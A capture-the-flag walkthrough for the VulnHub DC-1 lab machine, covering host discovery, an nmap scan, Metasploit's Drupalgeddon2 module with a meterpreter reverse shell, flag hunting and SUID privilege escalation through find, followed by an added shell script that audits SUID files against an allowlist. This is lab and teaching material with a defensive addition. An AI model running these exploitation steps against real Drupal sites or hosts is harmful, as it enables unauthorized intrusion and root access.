Vulnhub target: DC-1
Target VM and environment setup:
Host machine: Kali
DC-1 VM download: DC: 1 ~ VulnHub
Host discovery:
arp-scan -l
The target's IP address is found to be 192.168.3.76
Information gathering:
nmap -A -sV 192.168.3.76
The target has three open ports: 22, 80 and 111. The HTTP service runs the Drupal CMS, version 7.
Finding and exploiting the vulnerability
Tool used: msfconsole
Load the exploit module
msf6 > search drupal
Matching Modules
================

   #  Name                                           Disclosure Date  Rank       Check  Description
   -  ----                                           ---------------  ----       -----  -----------
   0  exploit/unix/webapp/drupal_coder_exec          2016-07-13       excellent  Yes    Drupal CODER Module Remote Command Execution
   1  exploit/unix/webapp/drupal_drupalgeddon2       2018-03-28       excellent  Yes    Drupal Drupalgeddon 2 Forms API Property Injection
   2  exploit/multi/http/drupal_drupageddon          2014-10-15       excellent  No     Drupal HTTP Parameter Key/Value SQL Injection
   3  auxiliary/gather/drupal_openid_xxe             2012-10-17       normal     Yes    Drupal OpenID External Entity Injection
   4  exploit/unix/webapp/drupal_restws_exec         2016-07-13       excellent  Yes    Drupal RESTWS Module Remote PHP Code Execution
   5  exploit/unix/webapp/drupal_restws_unserialize  2019-02-20       normal     Yes    Drupal RESTful Web Services unserialize() RCE
   6  auxiliary/scanner/http/drupal_views_user_enum  2010-07-02       normal     Yes    Drupal Views Module Users Enumeration
   7  exploit/unix/webapp/php_xmlrpc_eval            2005-06-29       excellent  Yes    PHP XML-RPC Arbitrary Code Execution

Interact with a module by name or index. For example info 7, use 7 or use exploit/unix/webapp/php_xmlrpc_eval
msf6 > use 1
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
Set the module options and run the exploit.
To get a proper interactive shell with command echo, spawn a pty:
python -c 'import pty;pty.spawn("/bin/bash")'
Search for flag.txt; a flag4 turns up, so look at its contents.
www-data@DC-1:/var/www$ find / | grep flag
/home/flag4
/home/flag4/.bash_logout
/home/flag4/.profile
/home/flag4/flag4.txt
/home/flag4/.bash_history
/home/flag4/.bashrc
/var/www/flag1.txt
Contents (doesn't seem very useful):
www-data@DC-1:/var/www$ cat /home/flag4/flag4.txt
Can you use this same method to find or access the flag in root?
Probably. But perhaps it's not that easy. Or maybe it is?
SUID privilege escalation:
Continuing with the usual steps: the flag4 hint mentions find, and this box has a find binary with the SUID root bit set, so can find be used to escalate privileges? List the SUID files:
find / -perm -4000 -type f -exec ls -al {} \; 2>/dev/null
www-data@DC-1:/var/www$ find / -perm -4000 -type f -exec ls -al {} \; 2>/dev/null
-rwsr-xr-x 1 root root 88744 Dec 10 2012 /bin/mount
-rwsr-xr-x 1 root root 31104 Apr 13 2011 /bin/ping
-rwsr-xr-x 1 root root 35200 Feb 27 2017 /bin/su
-rwsr-xr-x 1 root root 35252 Apr 13 2011 /bin/ping6
-rwsr-xr-x 1 root root 67704 Dec 10 2012 /bin/umount
-rwsr-sr-x 1 daemon daemon 50652 Oct 4 2014 /usr/bin/at
-rwsr-xr-x 1 root root 35892 Feb 27 2017 /usr/bin/chsh
-rwsr-xr-x 1 root root 45396 Feb 27 2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 30880 Feb 27 2017 /usr/bin/newgrp
-rwsr-xr-x 1 root root 44564 Feb 27 2017 /usr/bin/chfn
-rwsr-xr-x 1 root root 66196 Feb 27 2017 /usr/bin/gpasswd
-rwsr-sr-x 1 root mail 83912 Nov 18 2017 /usr/bin/procmail
-rwsr-xr-x 1 root root 162424 Jan 6 2012 /usr/bin/find
-rwsr-xr-x 1 root root 937564 Feb 11 2018 /usr/sbin/exim4
-rwsr-xr-x 1 root root 9660 Jun 20 2017 /usr/lib/pt_chown
-rwsr-xr-x 1 root root 248036 Jan 27 2018 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 5412 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-- 1 root messagebus 321692 Feb 10 2015 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 84532 May 22 2013 /sbin/mount.nfs
Sure enough, find can be used to escalate to root.
View the final flag.txt.
Summary:
1. DC-1 is an easy, entry-level box, well suited to beginners for getting familiar with the penetration testing workflow.
2. Information gathering is especially important for the whole engagement: port scanning and collecting the website's fingerprint.
3. Familiarity with msfconsole; finding and using the right exploit module takes some practice.
4. Understanding SUID privilege escalation, specifically via find.
Copyright notice: this article is an original work by weixin_51566481, released under the CC 4.0 BY-SA license. Please include a link to the original source and this notice when reposting.
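From the defender's side, the listing above is exactly what a SUID audit should be comparing against a baseline: a stock /usr/bin/find is never SUID root, so it stands out immediately. The script below is an added example written for this page, not part of the original walkthrough; it takes the `ls -al` lines produced by that find command, pulls out the paths, and reports every SUID file not on an expected allowlist. The allowlist and the sample lines are assumptions constructed from the output above.

```shell
#!/bin/sh
# Added audit helper (not from the original walkthrough).
# Input: the `ls -al` lines produced by
#   find / -perm -4000 -type f -exec ls -al {} \; 2>/dev/null
# Output: one unexpected SUID path per line; exit status 1 if any were found.

# Sample listing, constructed from a subset of the DC-1 output quoted above.
SUID_LISTING='-rwsr-xr-x 1 root root 88744 Dec 10 2012 /bin/mount
-rwsr-xr-x 1 root root 35200 Feb 27 2017 /bin/su
-rwsr-xr-x 1 root root 45396 Feb 27 2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 162424 Jan 6 2012 /usr/bin/find
-rwsr-xr-x 1 root root 937564 Feb 11 2018 /usr/sbin/exim4'

# Assumed baseline: SUID binaries a stock Debian install is expected to ship.
# Anything site-specific (a mail server's exim4, for instance) belongs here too,
# once it has been reviewed; until then it is reported.
EXPECTED_SUID='/bin/mount /bin/umount /bin/su /bin/ping /bin/ping6
/usr/bin/passwd /usr/bin/chsh /usr/bin/chfn /usr/bin/newgrp /usr/bin/gpasswd
/usr/bin/sudo'

# audit_suid LISTING
#   Prints each SUID path that is not on the allowlist.
#   Returns 0 when the listing is clean, 1 when something was reported.
audit_suid() {
    listing="$1"
    found=0
    # The path is the last whitespace-separated field of each `ls -al` line.
    for path in $(printf '%s\n' "$listing" | awk '{print $NF}'); do
        case " $(printf '%s' "$EXPECTED_SUID" | tr '\n' ' ') " in
            *" $path "*) ;;                       # on the allowlist, fine
            *) printf '%s\n' "$path"; found=1 ;;  # unexpected SUID file
        esac
    done
    return $found
}

# Stand-alone run: reports /usr/bin/find and /usr/sbin/exim4 for the sample.
audit_suid "$SUID_LISTING"
```

On a real host, replace the sample with the live find output and keep the allowlist under version control so a newly appearing SUID binary shows up as a diff rather than a surprise.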